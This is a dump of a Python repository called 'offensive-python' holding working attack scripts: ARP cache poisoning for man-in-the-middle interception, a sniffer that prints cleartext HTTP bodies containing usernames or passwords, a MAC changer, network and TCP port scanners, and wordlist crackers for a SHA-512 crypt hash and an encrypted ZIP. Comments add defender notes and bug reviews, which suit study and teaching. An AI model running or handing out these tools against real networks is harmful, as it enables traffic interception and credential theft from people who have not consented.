├── README.md
├── arp_spoof.py
├── linux_pass_cracker.py
├── mac_changer.py
├── network_scanner.py
├── packet_sniffer.py
├── tcp_scanner.py
└── zip_cracker.py


/README.md:
--------------------------------------------------------------------------------
# offensive-python


--------------------------------------------------------------------------------
/arp_spoof.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# ARP cache poisoning demo: repeatedly sends forged ARP replies to two hosts
# (a "target" and a "gateway"), then sends corrective replies on Ctrl+C.
#
# Defender's view: every packet built by spoof() is an unsolicited ARP reply
# that rebinds an existing IP to a different MAC. Switch-level Dynamic ARP
# Inspection, static ARP entries for the gateway, or a monitor that alerts
# when an IP-to-MAC mapping changes will catch this pattern.
import scapy.all as scapy
import argparse
import time
import sys

def get_arguments():
    """Parse -t/--target and -g/--gateway from the command line.

    Neither option is marked required, so either attribute is None when the
    flag is omitted; nothing below checks for that.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", dest="target", help="Specify target ip")
    parser.add_argument("-g", "--gateway", dest="gateway", help="Specify spoof ip")
    return parser.parse_args()

def get_mac(ip):
    """Return the hardware address of the first host answering an ARP request for *ip*.

    The request is broadcast at layer 2 and replies are collected for one
    second. If nothing answers, indexing the empty answer list raises
    IndexError, which no caller in this file handles.
    """
    arp_packet = scapy.ARP(pdst=ip)
    broadcast_packet = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_broadcast_packet = broadcast_packet/arp_packet
    # srp() returns (answered, unanswered); only the answered pairs are kept.
    answered_list = scapy.srp(arp_broadcast_packet, timeout=1, verbose=False)[0]
    # Each answered entry is a (sent, received) pair; [1] is the reply.
    return answered_list[0][1].hwsrc

def restore(destination_ip, source_ip):
    """Send *destination_ip* an ARP reply carrying the real MAC of *source_ip*.

    Both hardware addresses are looked up with get_mac() and set explicitly,
    so the reply advertises the genuine IP-to-MAC binding.
    """
    destination_mac = get_mac(destination_ip)
    source_mac = get_mac(source_ip)
    packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)
    # NOTE(review): 4 is passed positionally; which send() parameter it binds
    # to depends on the scapy version. Presumably a repeat count was intended;
    # confirm and pass it by keyword.
    scapy.send(packet, 4)

def spoof(target_ip, spoof_ip):
    """Send *target_ip* one ARP reply (op=2) that claims to come from *spoof_ip*.

    hwsrc is not set here, so scapy fills in its default source hardware
    address rather than the real owner's. That mismatch is what an ARP
    monitor detects.
    """
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)


arguments = get_arguments()
sent_packets = 0
try:
    # Two forged replies every two seconds, one in each direction. Each
    # spoof() call also performs a fresh ARP lookup through get_mac().
    while True:
        spoof(arguments.target, arguments.gateway)
        spoof(arguments.gateway, arguments.target)
        sent_packets+=2
        # NOTE(review): the trailing comma is the Python 2 idiom for
        # suppressing the newline; under Python 3 it only builds a
        # throwaway tuple and print() still ends the line.
        print("\r[+] Sent packets: " + str(sent_packets)),
        sys.stdout.flush()
        time.sleep(2)

except KeyboardInterrupt:
    # Only Ctrl+C triggers the restore; any other exception (for example the
    # IndexError from get_mac) exits without correcting the ARP caches.
    print("\n[-] Ctrl + C detected.....Restoring ARP Tables Please Wait!")
    restore(arguments.target,arguments.gateway)
    restore(arguments.gateway, arguments.target)



--------------------------------------------------------------------------------
/linux_pass_cracker.py:
--------------------------------------------------------------------------------
# Wordlist check against one hard-coded crypt(3) hash. The "$6$" prefix
# selects SHA-512 crypt; the salt "8HOLitkI" is repeated from the hash string
# being compared against.
#
# Defender's view: the salt only defeats precomputed tables. Resistance to a
# wordlist run like this comes from password strength, the hash's cost
# setting, and keeping the hash file unreadable to unprivileged users.
#
# NOTE(review): the crypt module was deprecated in Python 3.11 and removed in
# 3.13, so this import fails on current interpreters.
import crypt

# NOTE(review): the file handle is never closed; a with-block would do it.
password = open("password.txt", 'r')
for passwd in password.readlines():
    # Drop the line ending ("\n", then any remaining "\r") from each candidate.
    passwd = passwd.strip("\n").strip("\r")
    var = crypt.crypt(passwd,"$6$"+"8HOLitkI")
    if var == "$6$8HOLitkI$9HECw2MBzISI1O.RoyJdfugy4VHsTOU4RDTewcFECnZdWLpmtVwNo5a1/hg2kw4Qu74F08eMEwpLdK1eovfEd/":
        print("password found: ", passwd )
        break
    # NOTE(review): the listing lost its indentation; this else is read as
    # belonging to the if (one message per failed candidate). Confirm against
    # the original file.
    else:
        print("trying....")

--------------------------------------------------------------------------------
/mac_changer.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# Sets a new hardware (MAC) address on a network interface by shelling out to
# ifconfig three times: down, set address, up.
import subprocess
import optparse

def change_mac(interface, new_mac):
    """Bring *interface* down, assign *new_mac*, and bring it back up.

    Each command is passed to subprocess.call() as an argument list, so the
    values reach ifconfig as plain argv entries and are not interpreted by a
    shell. The three return codes are discarded: if any step fails (missing
    privileges, unknown interface, malformed address) the function still
    returns normally, and the interface may be left down.
    """
    print("[+] Changing MAC for interface " + interface + " to " + new_mac)

    subprocess.call(["ifconfig", interface, "down"])
    subprocess.call(["ifconfig", interface, "hw", "ether", new_mac])
    subprocess.call(["ifconfig", interface, "up"])

def get_arguments():
    """Parse -i/--interface and -m/--mac, and exit through parser.error() if either is missing.

    Only presence is checked; the format of the interface name and of the
    address is not validated here.
    """
    parser = optparse.OptionParser()
    parser.add_option("-i", "--interface", dest="interface", help="Specify interface to change MAC for, use --help for usage")
    parser.add_option("-m", "--mac", dest="new_mac", help="Specify the new MAC , use --help for usage")
    # The second element (positional arguments) is unused.
    (options, agruments) = parser.parse_args()
    if not options.interface:
        parser.error("[-] Please specify interface, use --help for usage")
    elif not options.new_mac:
        parser.error("[-] Please specify MAC , use --help for usage")
    return options



options = get_arguments()
change_mac(options.interface, options.new_mac)

--------------------------------------------------------------------------------
/network_scanner.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# ARP-based host discovery: broadcasts ARP requests for an address or range
# and prints the IP/MAC pairs that answer.
import scapy.all as scapy
import argparse

def get_arguments():
    """Parse -t/--target; the value is None when the flag is omitted."""
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", dest="target", help="Sepcify target ip or ip range")
    options = parser.parse_args()
    return options

def scan(ip):
    """Broadcast ARP requests for *ip* and return the responders.

    Returns a list of {"ip": ..., "mac": ...} dicts, one per reply received
    within the one-second timeout; the list is empty when nothing answers.
    """
    arp_packet = scapy.ARP(pdst=ip)
    broadcast_packet = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_broadcast_packet = broadcast_packet/arp_packet
    # srp() returns (answered, unanswered); only the answered pairs are kept.
    answered_list = scapy.srp(arp_broadcast_packet, timeout=1, verbose=False)[0]
    client_list = []

    for element in answered_list:
        # element is a (sent, received) pair; the reply carries the
        # responder's protocol (IP) and hardware (MAC) source addresses.
        client_dict = {"ip": element[1].psrc, "mac": element[1].hwsrc}
        client_list.append(client_dict)

    return client_list

def print_result(scan_list):
    """Print a two-column IP / MAC table for the dicts returned by scan()."""
    print("IP\t\t\tMAC\n----------------------------------------")
    for client in scan_list:
        print(client["ip"] + "\t\t" + client["mac"])

options = get_arguments()
result_list = scan(options.target)
print_result(result_list)


--------------------------------------------------------------------------------
/packet_sniffer.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# Passive capture on one interface: prints the host and path of each HTTP
# request seen, and the raw body when it contains a credential-like keyword.
#
# Defender's view: this parses cleartext HTTP only. Form fields sent over TLS
# are not visible to a passive capture like this, which is the practical
# argument for HTTPS everywhere plus HSTS.
import scapy.all as scapy
import argparse
from scapy.layers import http
def get_interface():
    """Parse -i/--interface and return its value (None when omitted)."""
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--interface", dest="interface", help="Specify interface on which to sniff packets")
    arguments = parser.parse_args()
    return arguments.interface

def sniff(iface):
    """Capture on *iface* indefinitely, handing every packet to process_packet().

    store=False keeps scapy from retaining the captured packets in memory.
    """
    scapy.sniff(iface=iface, store=False, prn=process_packet)

def process_packet(packet):
    """Report an HTTP request and, when present, a body that mentions a login keyword.

    The keyword test is a plain substring match on the raw payload, and the
    whole payload is printed on the first hit.
    """
    if packet.haslayer(http.HTTPRequest):
        # assumes Host and Path are the same string type as the literal -- TODO confirm
        print("[+] Http Request >> " + packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path)
        # NOTE(review): the listing lost its indentation; the Raw check is
        # read as nested inside the HTTPRequest branch. Confirm against the
        # original file.
        if packet.haslayer(scapy.Raw):
            load = packet[scapy.Raw].load
            keys = ["username", "password", "pass", "email"]
            for key in keys:
                # assumes load and the keys are the same string type -- TODO confirm
                if key in load:
                    print("\n\n\n[+] Possible password/username >> " + load + "\n\n\n")
                    # One report per packet, however many keywords match.
                    break

iface = get_interface()
sniff(iface)

--------------------------------------------------------------------------------
/tcp_scanner.py:
--------------------------------------------------------------------------------
# TCP connect() check of a comma-separated port list on one host, one thread
# per port.
#
# Defender's view: every probe is a full connect(), so each open port shows
# up as an accepted connection in service and firewall logs; a burst of
# connection attempts from one source across many ports is the signature to
# alert on.
from socket import * # wildcard import of the built-in socket module (socket, AF_INET, SOCK_STREAM, ...)
import optparse # command-line option parsing
import threading # one thread per port so the checks run concurrently

def portScan(host, port):
    """Try a TCP connection to *host*:*port* and print "open" or "closed".

    NOTE(review): the bare except reports "closed" for every failure, not
    only a refused connection: a timeout, a name-resolution error, or a
    non-numeric port string all print the same line. The socket is closed
    only on the success path.
    """
    try:
        s = socket(AF_INET, SOCK_STREAM) # AF_INET selects IPv4 (AF_INET6 would be IPv6)
        # SOCK_STREAM selects TCP (SOCK_DGRAM would be UDP)
        s.connect((host, int(port))) # attempt the connection; raises on failure
        print(host + " tcp/" + str(port) + " open")
        s.close()

    except:
        print(host + " tcp/" + str(port) + " closed") # reached on any exception, see the note above


def main():
    """Parse -H/--host and -p/--ports, then start one portScan thread per port.

    The threads are started but never joined.
    """

    parser = optparse.OptionParser("uasge%prog " + "-H -p ")
    parser.add_option("-H" , '--host' , dest = 'targethost' , type = 'string' , help = 'specify target hsot')
    parser.add_option("-p", "--ports", dest = 'targetports', type = 'string', help = 'specify target ports separated by "," ')

    option , args = parser.parse_args() # returns (options object, leftover positional arguments)

    thost = option.targethost # None when -H is omitted
    # NOTE(review): str() turns a missing -p into the text "None", so
    # tports[0] is never None and the second half of the check below can
    # never be true.
    tports = str(option.targetports).split(",")

    if thost == None or tports[0] == None:
        print(parser.usage) # print the usage string given to OptionParser above
        exit(0)


    setdefaulttimeout(1) # one-second default timeout for sockets created after this call
    # NOTE(review): host_ip is computed but never used; the threads below are
    # given thost. The call still raises if the name does not resolve.
    host_ip = gethostbyname(thost) # resolve the host name to an IPv4 address

    for port in tports:
        t = threading.Thread(target=portScan, args=(thost,port)) # one portScan thread per listed port
        t.start() # start the thread

main()

--------------------------------------------------------------------------------
/zip_cracker.py:
--------------------------------------------------------------------------------
# Wordlist check against an encrypted archive: tries each line of
# password.txt as the extraction password for test.zip.
#
# Defender's view: the standard-library zipfile module decrypts only the
# legacy ZIP encryption scheme, which is the one to avoid. Archives that need
# confidentiality should use AES-based encryption with a long passphrase.

import zipfile

# NOTE(review): neither the archive nor the wordlist handle is ever closed.
obj = zipfile.ZipFile("test.zip")

f = open("password.txt", 'r')

for password in f.readlines():
    # Drop the line ending ("\n", then any remaining "\r") from each candidate.
    password = password.strip("\n").strip("\r")

    # NOTE(review): the bare except treats every failure as a wrong guess, so
    # an I/O error, a type error or a corrupt archive is indistinguishable
    # from a bad password. There is also no break after a successful
    # extraction, so the loop keeps running through the rest of the list.
    try:
        obj.extractall(pwd=password)
        print("Password Found: " + password + " <<<<<<<<<<")

    except:
        print("Trying.......")


--------------------------------------------------------------------------------